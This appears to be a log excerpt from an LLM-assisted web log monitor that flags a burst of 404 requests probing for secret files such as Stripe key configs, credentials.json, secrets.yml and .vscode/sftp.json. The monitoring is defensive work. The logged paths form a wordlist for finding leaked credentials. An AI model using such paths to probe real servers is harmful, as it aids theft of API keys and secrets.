Mar 20 15:27:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:56.840858 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:27:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:27:56.840895 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:01.817304 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:01.817350 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:01.965185 [observer] Pipeline: processed=7233 pattern_hits=6647 llm_calls=586 llm_errors=3 learned=5
Mar 20 15:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:01.965387 [observer] Patterns: hash=6633 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=586
Mar 20 15:28:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:08.021810 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:28:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:08.021850 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:28:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:12.007121 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:28:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:12.007180 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:28:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:21.784977 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:28:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:21.785014 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=404 response for /stripe.conf suggests probing for a sensitive configuration file Line=2026-03-20T15:16:04.054193230Z GET /stripe.conf 404 0.695 ms - 9
Mar 20 15:28:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:27.287830 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:28:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:27.287885 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file at the root (stripe.ini) may indicate probing for configuration exposure or sensitive files; not definitive malicious but warrants alert. Line=2026-03-20T15:16:04.091224602Z GET /stripe.ini 404 2.728 ms - 9
Mar 20 15:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:31.760346 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:31.760386 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a .bak file (backup-like extension) returning 404 could indicate probing for backups or sensitive files. Line=2026-03-20T15:16:04.116409563Z GET /stripe.bak 404 2.265 ms - 9
Mar 20 15:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:31.938229 [observer] Pipeline: processed=7240 pattern_hits=6649 llm_calls=591 llm_errors=3 learned=5
Mar 20 15:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:31.938251 [observer] Patterns: hash=6635 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=591
Mar 20 15:28:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:36.062200 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.63 action=alert pattern_type=
Mar 20 15:28:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:36.062236 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a non-existent path /stripe.old resulting in a 404; could indicate probing for legacy endpoints or misconfigured routes. Line=2026-03-20T15:16:04.172673398Z GET /stripe.old 404 1.009 ms - 9
Mar 20 15:28:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:40.686290 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:28:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:40.686324 [analyzer] Source hint mismatch: LLM says "webserver_nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:28:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:44.120943 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:28:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:44.120986 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:28:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:50.199519 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 15:28:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:50.199554 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Single 404 on an unusual path could indicate probing for sensitive files. Line=2026-03-20T15:16:04.226535952Z GET /stripe.backup 404 0.910 ms - 9
Mar 20 15:28:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:54.979390 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:28:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:28:54.979432 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to stripe_keys.json returning 404 could indicate probing for sensitive keys or misconfigured clients. Not an active attack, but warrants scrutiny. Line=2026-03-20T15:16:04.282203723Z GET /stripe_keys.json 404 0.598 ms - 9
Mar 20 15:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:01.151968 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:01.152003 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a potentially sensitive file stripe_secret.json resulted in a 404. This could be a probe for sensitive endpoints. Line=2026-03-20T15:16:04.305864555Z GET /stripe_secret.json 404 3.537 ms - 9
Mar 20 15:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:01.967535 [observer] Pipeline: processed=7252 pattern_hits=6655 llm_calls=597 llm_errors=3 learned=5
Mar 20 15:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:01.967565 [observer] Patterns: hash=6641 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=597
Mar 20 15:29:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:05.395240 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:29:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:05.395278 [analyzer] Source hint mismatch: LLM says "web_server_http", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:12.153649 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:29:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:12.153698 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:16.881299 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:29:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:16.881339 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 for config/stripe.yaml could indicate probing for sensitive configuration files; not definitive abuse but warrants attention Line=2026-03-20T15:16:04.349699486Z GET /config/stripe.yaml 404 0.668 ms - 9
Mar 20 15:29:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:23.201646 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:29:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:23.201683 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:27.179317 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:29:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:27.179351 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:31.941963 [observer] Pipeline: processed=7259 pattern_hits=6657 llm_calls=602 llm_errors=3 learned=5
Mar 20 15:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:31.941993 [observer] Patterns: hash=6643 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=602
Mar 20 15:29:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:32.028255 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:29:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:32.028307 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:37.181564 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 15:29:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:37.181600 [analyzer] Source hint mismatch: LLM says "docker_http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:42.851766 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 15:29:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:42.851802 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a secrets.json path returned 404, which may indicate probing for sensitive files. Line=2026-03-20T15:16:04.490622305Z GET /secrets/stripe.json 404 2.356 ms - 9
Mar 20 15:29:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:47.751273 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:29:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:47.751314 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 for a specific resource indicates possibly probing or missing asset; not obviously malicious but requires monitoring. Line=2026-03-20T15:16:04.500723794Z GET /backup/stripe.json 404 0.749 ms - 9
Mar 20 15:29:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:52.016543 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:29:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:52.016580 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:29:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:56.977235 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:29:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:29:56.977272 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on a path that resembles sensitive keys (stripe.keys) indicates probing for secret files. Line=2026-03-20T15:16:04.560238741Z GET /storage/stripe.keys 404 0.637 ms - 9
Mar 20 15:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:01.161060 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:01.161198 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 for a stripe.json asset could indicate a misconfiguration or probing; not clearly malicious but worth monitoring. Line=2026-03-20T15:16:04.565343359Z GET /storage/app/stripe.json 404 0.671 ms - 9
Mar 20 15:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:01.985289 [observer] Pipeline: processed=7270 pattern_hits=6661 llm_calls=609 llm_errors=3 learned=5
Mar 20 15:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:01.985322 [observer] Patterns: hash=6647 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=609
Mar 20 15:30:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:04.716619 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:30:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:04.716659 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=404 Not Found for a path under storage/keys may indicate probing for sensitive configuration files Line=2026-03-20T15:16:04.616691844Z GET /storage/keys/stripe.json 404 0.670 ms - 9
Mar 20 15:30:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:09.802967 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:30:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:09.803002 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a secrets path (stripe.json) results in 404; potential probing for sensitive files Line=2026-03-20T15:16:04.626042899Z GET /storage/secrets/stripe.json 404 1.480 ms - 9
Mar 20 15:30:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:14.579467 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:30:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:14.579502 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a specific script under /settings (stripe.py) with a 404 response; could indicate probing for sensitive files. Line=2026-03-20T15:16:04.648958233Z GET /settings/stripe.py 404 0.738 ms - 9
Mar 20 15:30:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:20.105869 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:30:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:20.105918 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /config/initializers/stripe.rb is often probed by attackers to discover server-side configuration and potential exposure of sensitive files. The 404 indicates the resource does not exist, but the pattern is a targeted probe. Line=2026-03-20T15:16:04.682690569Z GET /config/initializers/stripe.rb 404 1.217 ms - 9
Mar 20 15:30:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:24.764392 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 15:30:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:24.764427 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:30:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:30.261953 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:30:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:30.261987 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 for a config file path (config/payment.yml) can indicate probing for sensitive files. Single occurrence not definitive, but warrants alerting. Line=2026-03-20T15:16:04.738685772Z GET /config/payment.yml 404 22.212 ms - 9
Mar 20 15:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:31.938470 [observer] Pipeline: processed=7278 pattern_hits=6663 llm_calls=615 llm_errors=3 learned=5
Mar 20 15:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:31.938494 [observer] Patterns: hash=6649 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=615
Mar 20 15:30:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:34.513041 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:30:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:34.513268 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:30:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:37.898297 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:30:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:37.898338 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:30:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:41.755342 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:30:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:41.755378 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:30:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:46.557237 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:30:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:46.557278 [analyzer] Learned prefix pattern for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto [allow]: "GET /api/v1/settings"
Mar 20 15:30:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:52.230309 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:30:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:52.230348 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:30:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:57.292571 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:30:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:30:57.292605 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:01.956804 [observer] Pipeline: processed=7288 pattern_hits=6667 llm_calls=621 llm_errors=3 learned=6
Mar 20 15:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:01.956921 [observer] Patterns: hash=6653 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=621
Mar 20 15:31:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:04.258569 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:31:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:04.258701 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:31:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:09.464536 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:31:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:09.464570 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /admin/settings with 404 indicates probing or misconfiguration exposure; not clearly malicious but warrants monitoring. Line=2026-03-20T15:16:04.858519403Z GET /admin/settings 404 0.931 ms - 9
Mar 20 15:31:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:14.742109 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:31:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:14.742150 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to credentials.json exists; HTTP 404 but probing for credentials could indicate sensitive file discovery Line=2026-03-20T15:16:04.881148928Z GET /credentials.json 404 0.707 ms - 9
Mar 20 15:31:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:20.416188 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:31:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:20.416226 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for credentials.txt with 404 response suggests probing for sensitive files; not confirmed malicious but warrants alert. Line=2026-03-20T15:16:04.900700120Z GET /credentials.txt 404 0.574 ms - 9
Mar 20 15:31:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:23.556465 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:31:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:23.556503 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to secrets.json is unusual and may indicate probing for sensitive files; 404 reduces risk but pattern is notable. Line=2026-03-20T15:16:04.909860674Z GET /secrets.json 404 0.562 ms - 9
Mar 20 15:31:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:28.265786 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.70 action=alert pattern_type=
Mar 20 15:31:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:28.265822 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to secrets.yml returning 404 can indicate probing for sensitive files or misconfiguration; not definitive, but warrants alerting. Line=2026-03-20T15:16:04.912386669Z GET /secrets.yml 404 0.501 ms - 9
Mar 20 15:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:31.764311 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:31.764347 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:31.938406 [observer] Pipeline: processed=7297 pattern_hits=6669 llm_calls=628 llm_errors=3 learned=6
Mar 20 15:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:31.938432 [observer] Patterns: hash=6655 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=628
Mar 20 15:31:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:39.513267 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:31:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:39.513308 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to secrets.yaml could indicate probing for sensitive files; 404 response but repeated access to a sensitive-named path warrants attention. Line=2026-03-20T15:16:04.965409410Z GET /secrets.yaml 404 0.745 ms - 9
Mar 20 15:31:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:44.941476 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:31:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:44.941511 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a hidden VSCODE config file (.vscode/sftp.json) via HTTP is unusual and could indicate probing for sensitive files. Line=2026-03-20T15:16:04.967361253Z GET /.vscode/sftp.json 404 0.483 ms - 9
Mar 20 15:31:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:49.282125 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:31:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:49.282184 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:31:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:54.193816 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:31:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:54.193852 [analyzer] Source hint mismatch: LLM says "webserver", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:31:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:58.944799 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:31:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:31:58.944834 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /config/secrets.yml returned 404, which is often attempted access to sensitive config or secrets. Not confirmed malicious, but warrants alert. Line=2026-03-20T15:16:05.139459168Z GET /config/secrets.yml 404 0.577 ms - 9
Mar 20 15:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:01.957544 [observer] Pipeline: processed=7304 pattern_hits=6671 llm_calls=633 llm_errors=3 learned=6
Mar 20 15:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:01.957574 [observer] Patterns: hash=6657 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=633
Mar 20 15:32:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:32:02.655501 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
